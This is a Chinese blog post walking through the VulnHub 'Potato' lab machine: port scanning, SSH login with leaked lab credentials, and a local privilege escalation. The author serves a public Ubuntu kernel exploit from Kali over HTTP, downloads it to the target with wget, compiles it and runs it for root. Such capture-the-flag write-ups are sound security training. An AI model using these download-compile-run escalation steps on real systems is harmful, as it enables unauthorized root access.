vulnhub-potato(SunCSR)


信息收集

扫描一波,找到靶机的IP,

直接IP打开80端口页面,发现除了一张土豆照片之外什么也没有,所以觉得可能会有其他端口开启了但没有被扫描到,所以,利用nmap再扫描一次,看到了开起了7120端口,而且利用了TCP协议,我在看了别人的wp之后了解到靶机将ssh服务转接到了7120端口。

前渗透阶段

所以我尝试连接一下发现了确实是一个ssh端口,但是我没有登录的账号密码,所以只能利用被人的wp,得到账号为potato,密码为letmein(主要是我的九头蛇出问题了,还有就是没有字典),登录上之后,我们相当于一个游客的权限。

后渗透阶段

在登陆上之候,sudo一下发现并没有文件我们是可以以root权限执行的,所以就只能从系统漏洞着手了,发现这是一个版本为3.13.0的Ubuntu。(很老的版本了)

在kali中寻找一下该系统的exp,将37292.c保存到/var/www/html目录下,

然后开启web服务。

python -m SimpleHTTPServer  //kali开启web服务
wget http://192.168.10.207:8000/wdnmd.c  //靶机下载exp


靶机从kali上下载exp,将39272利用gcc命令转变一下文件格式,从c文件转换为文件,(我背这一步卡了好长时间,最后看了c文件中给的提示才知道怎么操作)然后执行,拿到了root权限,拿到了flag。

gcc wdnmd.c -o wdnmd    /文件格式转换
./wdnmd            /执行文件,提权


文章作者: lemon-fan
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 lemon-fan !
 上一篇
vulnhub-Lampiao vulnhub-Lampiao
信息收集扫描靶机IP,以及靶机的端口,此靶场的开放端口会有点特殊,只看到了22端口和8端口,打开80端口,发现什么也没有,觉得应该像之前的做过的靶场一样有端口我们没有扫描出来,所以我用nmap再次扫描发现了一个不一样的端口打开1898界面,
2020-11-25
下一篇 
vulnhub-DC8 vulnhub-DC8
信息收集老规矩,扫描一波IP地址,发现靶机的IP和开放端口,靶机开放了80和22端口,推测我们又要从80端口开始渗透 前渗透阶段进入靶机的80页面之后发现是一个博客页面,随便点点,发现URL会发生变化,看着挺像做SQL注入时的靶场,所以,测
2020-11-17
  目录